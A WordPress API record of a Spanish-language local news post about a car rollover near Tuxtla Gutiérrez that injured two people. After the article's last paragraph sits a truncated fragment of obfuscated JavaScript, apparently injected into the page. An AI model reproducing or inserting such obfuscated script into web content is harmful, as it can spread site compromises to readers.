{"id":5704,"date":"2022-10-07T21:57:30","date_gmt":"2022-10-07T21:57:30","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5704"},"modified":"2022-10-07T21:57:32","modified_gmt":"2022-10-07T21:57:32","slug":"volcadura-salda-con-dos-heridos-2","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5704","title":{"rendered":"Volcadura salda con dos heridos"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"719\" height=\"960\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/FB_IMG_1665179813937.jpg\" alt=\"\" class=\"wp-image-5705\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/FB_IMG_1665179813937.jpg 719w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/FB_IMG_1665179813937-225x300.jpg 225w\" sizes=\"auto, (max-width: 719px) 100vw, 719px\" \/><\/figure>\n\n\n\n<p> Jairo Camacho.Agencia ReporteCiudadano, 7 de octubre del 2022. Tuxtla Guti\u00e9rrez.- Una fuerte volcadura en la carretera que conduce a Emiliano Zapata ocurrida este viernes por la madrugada dej\u00f3 dos heridos y cuantiosos da\u00f1os materiales.De acuerdo con los reportes de tr\u00e1nsito, por motivos desconocidos el conductor de la unidad perdi\u00f3 el control y termin\u00f3 volcando a la altura del crucero del Nuevo Libramiento Manuel Velasco Su\u00e1rez.Los dos ocupantes quedaron atrapados entre los fierros retorcidos del Matiz de color azul rey.Al lugar arribaron elementos de Protecci\u00f3n Civil y del Cuerpo de Bomberos para rescatar con herramienta especializada a los tripulantes que fueron trasladados a un nosocomio particular.El autom\u00f3vil fue levantado por una gr\u00faa y llevado al corral\u00f3n en turno para determinar la situaci\u00f3n jur\u00eddica.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 7 de octubre del 2022. Tuxtla Guti\u00e9rrez.- Una fuerte volcadura en la carretera que conduce a Emiliano Zapata ocurrida este viernes por la madrugada dej\u00f3 dos heridos y cuantiosos da\u00f1os materiales.De acuerdo con los reportes de tr\u00e1nsito, por motivos desconocidos el conductor de la unidad perdi\u00f3 el control y termin\u00f3 volcando a &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5705,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-5704","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5704","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5704"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5704\/revisions"}],"predecessor-version":[{"id":5706,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5704\/revisions\/5706"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5705"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5704"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5704"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5704"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}